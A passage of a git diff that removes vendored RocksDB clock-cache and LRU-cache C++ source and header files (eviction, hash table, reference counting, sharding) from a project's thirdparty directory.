-  }
-  size_t new_head = head_;
-  bool second_iteration = false;
-  while (usage + charge > capacity) {
-    assert(new_head < list_.size());
-    if (TryEvict(&list_[new_head], context)) {
-      usage = usage_.load(std::memory_order_relaxed);
-    }
-    new_head = (new_head + 1 >= list_.size()) ? 0 : new_head + 1;
-    if (new_head == head_) {
-      if (second_iteration) {
-        return false;
-      } else {
-        second_iteration = true;
-      }
-    }
-  }
-  head_ = new_head;
-  return true;
-}
-
-void ClockCacheShard::SetCapacity(size_t capacity) {
-  CleanupContext context;
-  {
-    MutexLock l(&mutex_);
-    capacity_.store(capacity, std::memory_order_relaxed);
-    EvictFromCache(0, &context);
-  }
-  Cleanup(context);
-}
-
-void ClockCacheShard::SetStrictCapacityLimit(bool strict_capacity_limit) {
-  strict_capacity_limit_.store(strict_capacity_limit,
-                               std::memory_order_relaxed);
-}
-
-CacheHandle* ClockCacheShard::Insert(
-    const Slice& key, uint32_t hash, void* value, size_t charge,
-    void (*deleter)(const Slice& key, void* value), bool hold_reference,
-    CleanupContext* context) {
-  MutexLock l(&mutex_);
-  bool success = EvictFromCache(charge, context);
-  bool strict = strict_capacity_limit_.load(std::memory_order_relaxed);
-  if (!success && (strict || !hold_reference)) {
-    context->to_delete_key.push_back(key.data());
-    if (!hold_reference) {
-      context->to_delete_value.emplace_back(key, value, deleter);
-    }
-    return nullptr;
-  }
-  // Grab available handle from recycle bin. If recycle bin is empty, create
-  // and append new handle to end of circular list.
-  CacheHandle* handle = nullptr;
-  if (!recycle_.empty()) {
-    handle = recycle_.back();
-    recycle_.pop_back();
-  } else {
-    list_.emplace_back();
-    handle = &list_.back();
-  }
-  // Fill handle.
-  handle->key = key;
-  handle->hash = hash;
-  handle->value = value;
-  handle->charge = charge;
-  handle->deleter = deleter;
-  uint32_t flags = hold_reference ? kInCacheBit + kOneRef : kInCacheBit;
-  handle->flags.store(flags, std::memory_order_relaxed);
-  HashTable::accessor accessor;
-  if (table_.find(accessor, CacheKey(key, hash))) {
-    CacheHandle* existing_handle = accessor->second;
-    table_.erase(accessor);
-    UnsetInCache(existing_handle, context);
-  }
-  table_.insert(HashTable::value_type(CacheKey(key, hash), handle));
-  if (hold_reference) {
-    pinned_usage_.fetch_add(charge, std::memory_order_relaxed);
-  }
-  usage_.fetch_add(charge, std::memory_order_relaxed);
-  return handle;
-}
-
-Status ClockCacheShard::Insert(const Slice& key, uint32_t hash, void* value,
-                               size_t charge,
-                               void (*deleter)(const Slice& key, void* value),
-                               Cache::Handle** out_handle,
-                               Cache::Priority priority) {
-  CleanupContext context;
-  HashTable::accessor accessor;
-  char* key_data = new char[key.size()];
-  memcpy(key_data, key.data(), key.size());
-  Slice key_copy(key_data, key.size());
-  CacheHandle* handle = Insert(key_copy, hash, value, charge, deleter,
-                               out_handle != nullptr, &context);
-  Status s;
-  if (out_handle != nullptr) {
-    if (handle == nullptr) {
-      s = Status::Incomplete("Insert failed due to LRU cache being full.");
-    } else {
-      *out_handle = reinterpret_cast<Cache::Handle*>(handle);
-    }
-  }
-  Cleanup(context);
-  return s;
-}
-
-Cache::Handle* ClockCacheShard::Lookup(const Slice& key, uint32_t hash) {
-  HashTable::const_accessor accessor;
-  if (!table_.find(accessor, CacheKey(key, hash))) {
-    return nullptr;
-  }
-  CacheHandle* handle = accessor->second;
-  accessor.release();
-  // Ref() could fail if another thread sneak in and evict/erase the cache
-  // entry before we are able to hold reference.
-  if (!Ref(reinterpret_cast<Cache::Handle*>(handle))) {
-    return nullptr;
-  }
-  // Double check the key since the handle may now representing another key
-  // if other threads sneak in, evict/erase the entry and re-used the handle
-  // for another cache entry.
-  if (hash != handle->hash || key != handle->key) {
-    CleanupContext context;
-    Unref(handle, false, &context);
-    // It is possible Unref() delete the entry, so we need to cleanup.
-    Cleanup(context);
-    return nullptr;
-  }
-  return reinterpret_cast<Cache::Handle*>(handle);
-}
-
-bool ClockCacheShard::Release(Cache::Handle* h, bool force_erase) {
-  CleanupContext context;
-  CacheHandle* handle = reinterpret_cast<CacheHandle*>(h);
-  bool erased = Unref(handle, true, &context);
-  if (force_erase && !erased) {
-    erased = EraseAndConfirm(handle->key, handle->hash, &context);
-  }
-  Cleanup(context);
-  return erased;
-}
-
-void ClockCacheShard::Erase(const Slice& key, uint32_t hash) {
-  CleanupContext context;
-  EraseAndConfirm(key, hash, &context);
-  Cleanup(context);
-}
-
-bool ClockCacheShard::EraseAndConfirm(const Slice& key, uint32_t hash,
-                                      CleanupContext* context) {
-  MutexLock l(&mutex_);
-  HashTable::accessor accessor;
-  bool erased = false;
-  if (table_.find(accessor, CacheKey(key, hash))) {
-    CacheHandle* handle = accessor->second;
-    table_.erase(accessor);
-    erased = UnsetInCache(handle, context);
-  }
-  return erased;
-}
-
-void ClockCacheShard::EraseUnRefEntries() {
-  CleanupContext context;
-  {
-    MutexLock l(&mutex_);
-    table_.clear();
-    for (auto& handle : list_) {
-      UnsetInCache(&handle, &context);
-    }
-  }
-  Cleanup(context);
-}
-
-class ClockCache : public ShardedCache {
- public:
-  ClockCache(size_t capacity, int num_shard_bits, bool strict_capacity_limit)
-      : ShardedCache(capacity, num_shard_bits, strict_capacity_limit) {
-    int num_shards = 1 << num_shard_bits;
-    shards_ = new ClockCacheShard[num_shards];
-    SetCapacity(capacity);
-    SetStrictCapacityLimit(strict_capacity_limit);
-  }
-
-  virtual ~ClockCache() { delete[] shards_; }
-
-  virtual const char* Name() const override { return "ClockCache"; }
-
-  virtual CacheShard* GetShard(int shard) override {
-    return reinterpret_cast<CacheShard*>(&shards_[shard]);
-  }
-
-  virtual const CacheShard* GetShard(int shard) const override {
-    return reinterpret_cast<CacheShard*>(&shards_[shard]);
-  }
-
-  virtual void* Value(Handle* handle) override {
-    return reinterpret_cast<const CacheHandle*>(handle)->value;
-  }
-
-  virtual size_t GetCharge(Handle* handle) const override {
-    return reinterpret_cast<const CacheHandle*>(handle)->charge;
-  }
-
-  virtual uint32_t GetHash(Handle* handle) const override {
-    return reinterpret_cast<const CacheHandle*>(handle)->hash;
-  }
-
-  virtual void DisownData() override { shards_ = nullptr; }
-
- private:
-  ClockCacheShard* shards_;
-};
-
-}  // end anonymous namespace
-
-std::shared_ptr<Cache> NewClockCache(size_t capacity, int num_shard_bits,
-                                     bool strict_capacity_limit) {
-  if (num_shard_bits < 0) {
-    num_shard_bits = GetDefaultCacheShardBits(capacity);
-  }
-  return std::make_shared<ClockCache>(capacity, num_shard_bits,
-                                      strict_capacity_limit);
-}
-
-}  // namespace rocksdb
-
-#endif  // SUPPORT_CLOCK_CACHE
diff --git a/thirdparty/rocksdb/cache/clock_cache.h b/thirdparty/rocksdb/cache/clock_cache.h
deleted file mode 100644
index 1614c0e..0000000
--- a/thirdparty/rocksdb/cache/clock_cache.h
+++ /dev/null
@@ -1,16 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include "rocksdb/cache.h"
-
-#if defined(TBB) && !defined(ROCKSDB_LITE)
-#define SUPPORT_CLOCK_CACHE
-#endif
diff --git a/thirdparty/rocksdb/cache/lru_cache.cc b/thirdparty/rocksdb/cache/lru_cache.cc
deleted file mode 100644
index d29e709..0000000
--- a/thirdparty/rocksdb/cache/lru_cache.cc
+++ /dev/null
@@ -1,530 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "cache/lru_cache.h"
-
-#include <assert.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string>
-
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-
-LRUHandleTable::LRUHandleTable() : list_(nullptr), length_(0), elems_(0) {
-  Resize();
-}
-
-LRUHandleTable::~LRUHandleTable() {
-  ApplyToAllCacheEntries([](LRUHandle* h) {
-    if (h->refs == 1) {
-      h->Free();
-    }
-  });
-  delete[] list_;
-}
-
-LRUHandle* LRUHandleTable::Lookup(const Slice& key, uint32_t hash) {
-  return *FindPointer(key, hash);
-}
-
-LRUHandle* LRUHandleTable::Insert(LRUHandle* h) {
-  LRUHandle** ptr = FindPointer(h->key(), h->hash);
-  LRUHandle* old = *ptr;
-  h->next_hash = (old == nullptr ? nullptr : old->next_hash);
-  *ptr = h;
-  if (old == nullptr) {
-    ++elems_;
-    if (elems_ > length_) {
-      // Since each cache entry is fairly large, we aim for a small
-      // average linked list length (<= 1).
-      Resize();
-    }
-  }
-  return old;
-}
-
-LRUHandle* LRUHandleTable::Remove(const Slice& key, uint32_t hash) {
-  LRUHandle** ptr = FindPointer(key, hash);
-  LRUHandle* result = *ptr;
-  if (result != nullptr) {
-    *ptr = result->next_hash;
-    --elems_;
-  }
-  return result;
-}
-
-LRUHandle** LRUHandleTable::FindPointer(const Slice& key, uint32_t hash) {
-  LRUHandle** ptr = &list_[hash & (length_ - 1)];
-  while (*ptr != nullptr && ((*ptr)->hash != hash || key != (*ptr)->key())) {
-    ptr = &(*ptr)->next_hash;
-  }
-  return ptr;
-}
-
-void LRUHandleTable::Resize() {
-  uint32_t new_length = 16;
-  while (new_length < elems_ * 1.5) {
-    new_length *= 2;
-  }
-  LRUHandle** new_list = new LRUHandle*[new_length];
-  memset(new_list, 0, sizeof(new_list[0]) * new_length);
-  uint32_t count = 0;
-  for (uint32_t i = 0; i < length_; i++) {
-    LRUHandle* h = list_[i];
-    while (h != nullptr) {
-      LRUHandle* next = h->next_hash;
-      uint32_t hash = h->hash;
-      LRUHandle** ptr = &new_list[hash & (new_length - 1)];
-      h->next_hash = *ptr;
-      *ptr = h;
-      h = next;
-      count++;
-    }
-  }
-  assert(elems_ == count);
-  delete[] list_;
-  list_ = new_list;
-  length_ = new_length;
-}
-
-LRUCacheShard::LRUCacheShard()
-    : high_pri_pool_usage_(0), usage_(0), lru_usage_(0) {
-  // Make empty circular linked list
-  lru_.next = &lru_;
-  lru_.prev = &lru_;
-  lru_low_pri_ = &lru_;
-}
-
-LRUCacheShard::~LRUCacheShard() {}
-
-bool LRUCacheShard::Unref(LRUHandle* e) {
-  assert(e->refs > 0);
-  e->refs--;
-  return e->refs == 0;
-}
-
-// Call deleter and free
-
-void LRUCacheShard::EraseUnRefEntries() {
-  autovector<LRUHandle*> last_reference_list;
-  {
-    MutexLock l(&mutex_);
-    while (lru_.next != &lru_) {
-      LRUHandle* old = lru_.next;
-      assert(old->InCache());
-      assert(old->refs ==
-             1);  // LRU list contains elements which may be evicted
-      LRU_Remove(old);
-      table_.Remove(old->key(), old->hash);
-      old->SetInCache(false);
-      Unref(old);
-      usage_ -= old->charge;
-      last_reference_list.push_back(old);
-    }
-  }
-
-  for (auto entry : last_reference_list) {
-    entry->Free();
-  }
-}
-
-void LRUCacheShard::ApplyToAllCacheEntries(void (*callback)(void*, size_t),
-                                           bool thread_safe) {
-  if (thread_safe) {
-    mutex_.Lock();
-  }
-  table_.ApplyToAllCacheEntries(
-      [callback](LRUHandle* h) { callback(h->value, h->charge); });
-  if (thread_safe) {
-    mutex_.Unlock();
-  }
-}
-
-void LRUCacheShard::TEST_GetLRUList(LRUHandle** lru, LRUHandle** lru_low_pri) {
-  *lru = &lru_;
-  *lru_low_pri = lru_low_pri_;
-}
-
-size_t LRUCacheShard::TEST_GetLRUSize() {
-  LRUHandle* lru_handle = lru_.next;
-  size_t lru_size = 0;
-  while (lru_handle != &lru_) {
-    lru_size++;
-    lru_handle = lru_handle->next;
-  }
-  return lru_size;
-}
-
-void LRUCacheShard::LRU_Remove(LRUHandle* e) {
-  assert(e->next != nullptr);
-  assert(e->prev != nullptr);
-  if (lru_low_pri_ == e) {
-    lru_low_pri_ = e->prev;
-  }
-  e->next->prev = e->prev;
-  e->prev->next = e->next;
-  e->prev = e->next = nullptr;
-  lru_usage_ -= e->charge;
-  if (e->InHighPriPool()) {
-    assert(high_pri_pool_usage_ >= e->charge);
-    high_pri_pool_usage_ -= e->charge;
-  }
-}
-
-void LRUCacheShard::LRU_Insert(LRUHandle* e) {
-  assert(e->next == nullptr);
-  assert(e->prev == nullptr);
-  if (high_pri_pool_ratio_ > 0 && e->IsHighPri()) {
-    // Inset "e" to head of LRU list.
-    e->next = &lru_;
-    e->prev = lru_.prev;
-    e->prev->next = e;
-    e->next->prev = e;
-    e->SetInHighPriPool(true);
-    high_pri_pool_usage_ += e->charge;
-    MaintainPoolSize();
-  } else {
-    // Insert "e" to the head of low-pri pool. Note that when
-    // high_pri_pool_ratio is 0, head of low-pri pool is also head of LRU list.
-    e->next = lru_low_pri_->next;
-    e->prev = lru_low_pri_;
-    e->prev->next = e;
-    e->next->prev = e;
-    e->SetInHighPriPool(false);
-    lru_low_pri_ = e;
-  }
-  lru_usage_ += e->charge;
-}
-
-void LRUCacheShard::MaintainPoolSize() {
-  while (high_pri_pool_usage_ > high_pri_pool_capacity_) {
-    // Overflow last entry in high-pri pool to low-pri pool.
-    lru_low_pri_ = lru_low_pri_->next;
-    assert(lru_low_pri_ != &lru_);
-    lru_low_pri_->SetInHighPriPool(false);
-    high_pri_pool_usage_ -= lru_low_pri_->charge;
-  }
-}
-
-void LRUCacheShard::EvictFromLRU(size_t charge,
-                                 autovector<LRUHandle*>* deleted) {
-  while (usage_ + charge > capacity_ && lru_.next != &lru_) {
-    LRUHandle* old = lru_.next;
-    assert(old->InCache());
-    assert(old->refs == 1);  // LRU list contains elements which may be evicted
-    LRU_Remove(old);
-    table_.Remove(old->key(), old->hash);
-    old->SetInCache(false);
-    Unref(old);
-    usage_ -= old->charge;
-    deleted->push_back(old);
-  }
-}
-
-void* LRUCacheShard::operator new(size_t size) {
-  return port::cacheline_aligned_alloc(size);
-}
-
-void* LRUCacheShard::operator new[](size_t size) {
-  return port::cacheline_aligned_alloc(size);
-}
-
-void LRUCacheShard::operator delete(void *memblock) {
-  port::cacheline_aligned_free(memblock);
-}
-
-void LRUCacheShard::operator delete[](void* memblock) {
-  port::cacheline_aligned_free(memblock);
-}
-
-void LRUCacheShard::SetCapacity(size_t capacity) {
-  autovector<LRUHandle*> last_reference_list;
-  {
-    MutexLock l(&mutex_);
-    capacity_ = capacity;
-    high_pri_pool_capacity_ = capacity_ * high_pri_pool_ratio_;
-    EvictFromLRU(0, &last_reference_list);
-  }
-  // we free the entries here outside of mutex for
-  // performance reasons
-  for (auto entry : last_reference_list) {
-    entry->Free();
-  }
-}
-
-void LRUCacheShard::SetStrictCapacityLimit(bool strict_capacity_limit) {
-  MutexLock l(&mutex_);
-  strict_capacity_limit_ = strict_capacity_limit;
-}
-
-Cache::Handle* LRUCacheShard::Lookup(const Slice& key, uint32_t hash) {
-  MutexLock l(&mutex_);
-  LRUHandle* e = table_.Lookup(key, hash);
-  if (e != nullptr) {
-    assert(e->InCache());
-    if (e->refs == 1) {
-      LRU_Remove(e);
-    }
-    e->refs++;
-  }
-  return reinterpret_cast<Cache::Handle*>(e);
-}
-
-bool LRUCacheShard::Ref(Cache::Handle* h) {
-  LRUHandle* handle = reinterpret_cast<LRUHandle*>(h);
-  MutexLock l(&mutex_);
-  if (handle->InCache() && handle->refs == 1) {
-    LRU_Remove(handle);
-  }
-  handle->refs++;
-  return true;
-}
-
-void LRUCacheShard::SetHighPriorityPoolRatio(double high_pri_pool_ratio) {
-  MutexLock l(&mutex_);
-  high_pri_pool_ratio_ = high_pri_pool_ratio;
-  high_pri_pool_capacity_ = capacity_ * high_pri_pool_ratio_;
-  MaintainPoolSize();
-}
-
-bool LRUCacheShard::Release(Cache::Handle* handle, bool force_erase) {
-  if (handle == nullptr) {
-    return false;
-  }
-  LRUHandle* e = reinterpret_cast<LRUHandle*>(handle);
-  bool last_reference = false;
-  {
-    MutexLock l(&mutex_);
-    last_reference = Unref(e);
-    if (last_reference) {
-      usage_ -= e->charge;
-    }
-    if (e->refs == 1 && e->InCache()) {
-      // The item is still in cache, and nobody else holds a reference to it
-      if (usage_ > capacity_ || force_erase) {
-        // the cache is full
-        // The LRU list must be empty since the cache is full
-        assert(!(usage_ > capacity_) || lru_.next == &lru_);
-        // take this opportunity and remove the item
-        table_.Remove(e->key(), e->hash);
-        e->SetInCache(false);
-        Unref(e);
-        usage_ -= e->charge;
-        last_reference = true;
-      } else {
-        // put the item on the list to be potentially freed
-        LRU_Insert(e);
-      }
-    }
-  }
-
-  // free outside of mutex
-  if (last_reference) {
-    e->Free();
-  }
-  return last_reference;
-}
-
-Status LRUCacheShard::Insert(const Slice& key, uint32_t hash, void* value,
-                             size_t charge,
-                             void (*deleter)(const Slice& key, void* value),
-                             Cache::Handle** handle, Cache::Priority priority) {
-  // Allocate the memory here outside of the mutex
-  // If the cache is full, we'll have to release it
-  // It shouldn't happen very often though.
-  LRUHandle* e = reinterpret_cast<LRUHandle*>(
-      new char[sizeof(LRUHandle) - 1 + key.size()]);
-  Status s;
-  autovector<LRUHandle*> last_reference_list;
-
-  e->value = value;
-  e->deleter = deleter;
-  e->charge = charge;
-  e->key_length = key.size();
-  e->hash = hash;
-  e->refs = (handle == nullptr
-                 ? 1
-                 : 2);  // One from LRUCache, one for the returned handle
-  e->next = e->prev = nullptr;
-  e->SetInCache(true);
-  e->SetPriority(priority);
-  memcpy(e->key_data, key.data(), key.size());
-
-  {
-    MutexLock l(&mutex_);
-
-    // Free the space following strict LRU policy until enough space
-    // is freed or the lru list is empty
-    EvictFromLRU(charge, &last_reference_list);
-
-    if (usage_ - lru_usage_ + charge > capacity_ &&
-        (strict_capacity_limit_ || handle == nullptr)) {
-      if (handle == nullptr) {
-        // Don't insert the entry but still return ok, as if the entry inserted
-        // into cache and get evicted immediately.
-        last_reference_list.push_back(e);
-      } else {
-        delete[] reinterpret_cast<char*>(e);
-        *handle = nullptr;
-        s = Status::Incomplete("Insert failed due to LRU cache being full.");
-      }
-    } else {
-      // insert into the cache
-      // note that the cache might get larger than its capacity if not enough
-      // space was freed
-      LRUHandle* old = table_.Insert(e);
-      usage_ += e->charge;
-      if (old != nullptr) {
-        old->SetInCache(false);
-        if (Unref(old)) {
-          usage_ -= old->charge;
-          // old is on LRU because it's in cache and its reference count
-          // was just 1 (Unref returned 0)
-          LRU_Remove(old);
-          last_reference_list.push_back(old);
-        }
-      }
-      if (handle == nullptr) {
-        LRU_Insert(e);
-      } else {
-        *handle = reinterpret_cast<Cache::Handle*>(e);
-      }
-      s = Status::OK();
-    }
-  }
-
-  // we free the entries here outside of mutex for
-  // performance reasons
-  for (auto entry : last_reference_list) {
-    entry->Free();
-  }
-
-  return s;
-}
-
-void LRUCacheShard::Erase(const Slice& key, uint32_t hash) {
-  LRUHandle* e;
-  bool last_reference = false;
-  {
-    MutexLock l(&mutex_);
-    e = table_.Remove(key, hash);
-    if (e != nullptr) {
-      last_reference = Unref(e);
-      if (last_reference) {
-        usage_ -= e->charge;
-      }
-      if (last_reference && e->InCache()) {
-        LRU_Remove(e);
-      }
-      e->SetInCache(false);
-    }
-  }
-
-  // mutex not held here
-  // last_reference will only be true if e != nullptr
-  if (last_reference) {
-    e->Free();
-  }
-}
-
-size_t LRUCacheShard::GetUsage() const {
-  MutexLock l(&mutex_);
-  return usage_;
-}
-
-size_t LRUCacheShard::GetPinnedUsage() const {
-  MutexLock l(&mutex_);
-  assert(usage_ >= lru_usage_);
-  return usage_ - lru_usage_;
-}
-
-std::string LRUCacheShard::GetPrintableOptions() const {
-  const int kBufferSize = 200;
-  char buffer[kBufferSize];
-  {
-    MutexLock l(&mutex_);
-    snprintf(buffer, kBufferSize, "    high_pri_pool_ratio: %.3lf\n",
-             high_pri_pool_ratio_);
-  }
-  return std::string(buffer);
-}
-
-LRUCache::LRUCache(size_t capacity, int num_shard_bits,
-                   bool strict_capacity_limit, double high_pri_pool_ratio)
-    : ShardedCache(capacity, num_shard_bits, strict_capacity_limit) {
-  num_shards_ = 1 << num_shard_bits;
-  shards_ = new LRUCacheShard[num_shards_];
-  SetCapacity(capacity);
-  SetStrictCapacityLimit(strict_capacity_limit);
-  for (int i = 0; i < num_shards_; i++) {
-    shards_[i].SetHighPriorityPoolRatio(high_pri_pool_ratio);
-  }
-}
-
-LRUCache::~LRUCache() { delete[] shards_; }
-
-CacheShard* LRUCache::GetShard(int shard) {
-  return reinterpret_cast<CacheShard*>(&shards_[shard]);
-}
-
-const CacheShard* LRUCache::GetShard(int shard) const {
-  return reinterpret_cast<CacheShard*>(&shards_[shard]);
-}
-
-void* LRUCache::Value(Handle* handle) {
-  return reinterpret_cast<const LRUHandle*>(handle)->value;
-}
-
-size_t LRUCache::GetCharge(Handle* handle) const {
-  return reinterpret_cast<const LRUHandle*>(handle)->charge;
-}
-
-uint32_t LRUCache::GetHash(Handle* handle) const {
-  return reinterpret_cast<const LRUHandle*>(handle)->hash;
-}
-
-void LRUCache::DisownData() {
-// Do not drop data if compile with ASAN to suppress leak warning.
-#ifndef __SANITIZE_ADDRESS__
-  shards_ = nullptr;
-#endif  // !__SANITIZE_ADDRESS__
-}
-
-size_t LRUCache::TEST_GetLRUSize() {
-  size_t lru_size_of_all_shards = 0;
-  for (int i = 0; i < num_shards_; i++) {
-    lru_size_of_all_shards += shards_[i].TEST_GetLRUSize();
-  }
-  return lru_size_of_all_shards;
-}
-
-std::shared_ptr<Cache> NewLRUCache(size_t capacity, int num_shard_bits,
-                                   bool strict_capacity_limit,
-                                   double high_pri_pool_ratio) {
-  if (num_shard_bits >= 20) {
-    return nullptr;  // the cache cannot be sharded into too many fine pieces
-  }
-  if (high_pri_pool_ratio < 0.0 || high_pri_pool_ratio > 1.0) {
-    // invalid high_pri_pool_ratio
-    return nullptr;
-  }
-  if (num_shard_bits < 0) {
-    num_shard_bits = GetDefaultCacheShardBits(capacity);
-  }
-  return std::make_shared<LRUCache>(capacity, num_shard_bits,
-                                    strict_capacity_limit, high_pri_pool_ratio);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/cache/lru_cache.h b/thirdparty/rocksdb/cache/lru_cache.h
deleted file mode 100644
index abe78fd..0000000
--- a/thirdparty/rocksdb/cache/lru_cache.h
+++ /dev/null
@@ -1,302 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include <string>
-
-#include "cache/sharded_cache.h"
-
-#include "port/port.h"
-#include "util/autovector.h"
-
-namespace rocksdb {
-
-// LRU cache implementation
-
-// An entry is a variable length heap-allocated structure.
-// Entries are referenced by cache and/or by any external entity.
-// The cache keeps all its entries in table. Some elements
-// are also stored on LRU list.
-//
-// LRUHandle can be in these states:
-// 1. Referenced externally AND in hash table.
-//  In that case the entry is *not* in the LRU. (refs > 1 && in_cache == true)
-// 2. Not referenced externally and in hash table. In that case the entry is
-// in the LRU and can be freed. (refs == 1 && in_cache == true)
-// 3. Referenced externally and not in hash table. In that case the entry is
-// in not on LRU and not in table. (refs >= 1 && in_cache == false)
-//
-// All newly created LRUHandles are in state 1. If you call
-// LRUCacheShard::Release
-// on entry in state 1, it will go into state 2. To move from state 1 to
-// state 3, either call LRUCacheShard::Erase or LRUCacheShard::Insert with the
-// same key.
-// To move from state 2 to state 1, use LRUCacheShard::Lookup.
-// Before destruction, make sure that no handles are in state 1. This means
-// that any successful LRUCacheShard::Lookup/LRUCacheShard::Insert have a
-// matching
-// RUCache::Release (to move into state 2) or LRUCacheShard::Erase (for state 3)
-
-struct LRUHandle {
-  void* value;
-  void (*deleter)(const Slice&, void* value);
-  LRUHandle* next_hash;
-  LRUHandle* next;
-  LRUHandle* prev;
-  size_t charge;  // TODO(opt): Only allow uint32_t?
-  size_t key_length;
-  uint32_t refs;     // a number of refs to this entry
-                     // cache itself is counted as 1
-
-  // Include the following flags:
-  //   in_cache:    whether this entry is referenced by the hash table.
-  //   is_high_pri: whether this entry is high priority entry.
-  //   in_high_pro_pool: whether this entry is in high-pri pool.
-  char flags;
-
-  uint32_t hash;     // Hash of key(); used for fast sharding and comparisons
-
-  char key_data[1];  // Beginning of key
-
-  Slice key() const {
-    // For cheaper lookups, we allow a temporary Handle object
-    // to store a pointer to a key in "value".
-    if (next == this) {
-      return *(reinterpret_cast<Slice*>(value));
-    } else {
-      return Slice(key_data, key_length);
-    }
-  }
-
-  bool InCache() { return flags & 1; }
-  bool IsHighPri() { return flags & 2; }
-  bool InHighPriPool() { return flags & 4; }
-
-  void SetInCache(bool in_cache) {
-    if (in_cache) {
-      flags |= 1;
-    } else {
-      flags &= ~1;
-    }
-  }
-
-  void SetPriority(Cache::Priority priority) {
-    if (priority == Cache::Priority::HIGH) {
-      flags |= 2;
-    } else {
-      flags &= ~2;
-    }
-  }
-
-  void SetInHighPriPool(bool in_high_pri_pool) {
-    if (in_high_pri_pool) {
-      flags |= 4;
-    } else {
-      flags &= ~4;
-    }
-  }
-
-  void Free() {
-    assert((refs == 1 && InCache()) || (refs == 0 && !InCache()));
-    if (deleter) {
-      (*deleter)(key(), value);
-    }
-    delete[] reinterpret_cast<char*>(this);
-  }
-};
-
-// We provide our own simple hash table since it removes a whole bunch
-// of porting hacks and is also faster than some of the built-in hash
-// table implementations in some of the compiler/runtime combinations
-// we have tested.  E.g., readrandom speeds up by ~5% over the g++
-// 4.4.3's builtin hashtable.
-class LRUHandleTable {
- public:
-  LRUHandleTable();
-  ~LRUHandleTable();
-
-  LRUHandle* Lookup(const Slice& key, uint32_t hash);
-  LRUHandle* Insert(LRUHandle* h);
-  LRUHandle* Remove(const Slice& key, uint32_t hash);
-
-  template <typename T>
-  void ApplyToAllCacheEntries(T func) {
-    for (uint32_t i = 0; i < length_; i++) {
-      LRUHandle* h = list_[i];
-      while (h != nullptr) {
-        auto n = h->next_hash;
-        assert(h->InCache());
-        func(h);
-        h = n;
-      }
-    }
-  }
-
- private:
-  // Return a pointer to slot that points to a cache entry that
-  // matches key/hash.  If there is no such cache entry, return a
-  // pointer to the trailing slot in the corresponding linked list.
-  LRUHandle** FindPointer(const Slice& key, uint32_t hash);
-
-  void Resize();
-
-  // The table consists of an array of buckets where each bucket is
-  // a linked list of cache entries that hash into the bucket.
-  LRUHandle** list_;
-  uint32_t length_;
-  uint32_t elems_;
-};
-
-// A single shard of sharded cache.
-class ALIGN_AS(CACHE_LINE_SIZE) LRUCacheShard : public CacheShard {
- public:
-  LRUCacheShard();
-  virtual ~LRUCacheShard();
-
-  // Separate from constructor so caller can easily make an array of LRUCache
-  // if current usage is more than new capacity, the function will attempt to
-  // free the needed space
-  virtual void SetCapacity(size_t capacity) override;
-
-  // Set the flag to reject insertion if cache if full.
-  virtual void SetStrictCapacityLimit(bool strict_capacity_limit) override;
-
-  // Set percentage of capacity reserved for high-pri cache entries.
-  void SetHighPriorityPoolRatio(double high_pri_pool_ratio);
-
-  // Like Cache methods, but with an extra "hash" parameter.
-  virtual Status Insert(const Slice& key, uint32_t hash, void* value,
-                        size_t charge,
-                        void (*deleter)(const Slice& key, void* value),
-                        Cache::Handle** handle,
-                        Cache::Priority priority) override;
-  virtual Cache::Handle* Lookup(const Slice& key, uint32_t hash) override;
-  virtual bool Ref(Cache::Handle* handle) override;
-  virtual bool Release(Cache::Handle* handle,
-                       bool force_erase = false) override;
-  virtual void Erase(const Slice& key, uint32_t hash) override;
-
-  // Although in some platforms the update of size_t is atomic, to make sure
-  // GetUsage() and GetPinnedUsage() work correctly under any platform, we'll
-  // protect them with mutex_.
-
-  virtual size_t GetUsage() const override;
-  virtual size_t GetPinnedUsage() const override;
-
-  virtual void ApplyToAllCacheEntries(void (*callback)(void*, size_t),
-                                      bool thread_safe) override;
-
-  virtual void EraseUnRefEntries() override;
-
-  virtual std::string GetPrintableOptions() const override;
-
-  void TEST_GetLRUList(LRUHandle** lru, LRUHandle** lru_low_pri);
-
-  //  Retrieves number of elements in LRU, for unit test purpose only
-  //  not threadsafe
-  size_t TEST_GetLRUSize();
-
-  // Overloading to aligned it to cache line size
-  void* operator new(size_t);
-
-  void* operator new[](size_t);
-
-  void operator delete(void *);
-
-  void operator delete[](void*);
-
- private:
-  void LRU_Remove(LRUHandle* e);
-  void LRU_Insert(LRUHandle* e);
-
-  // Overflow the last entry in high-pri pool to low-pri pool until size of
-  // high-pri pool is no larger than the size specify by high_pri_pool_pct.
-  void MaintainPoolSize();
-
-  // Just reduce the reference count by 1.
-  // Return true if last reference
-  bool Unref(LRUHandle* e);
-
-  // Free some space following strict LRU policy until enough space
-  // to hold (usage_ + charge) is freed or the lru list is empty
-  // This function is not thread safe - it needs to be executed while
-  // holding the mutex_
-  void EvictFromLRU(size_t charge, autovector<LRUHandle*>* deleted);
-
-  // Initialized before use.
-  size_t capacity_;
-
-  // Memory size for entries in high-pri pool.
-  size_t high_pri_pool_usage_;
-
-  // Whether to reject insertion if cache reaches its full capacity.
-  bool strict_capacity_limit_;
-
-  // Ratio of capacity reserved for high priority cache entries.
-  double high_pri_pool_ratio_;
-
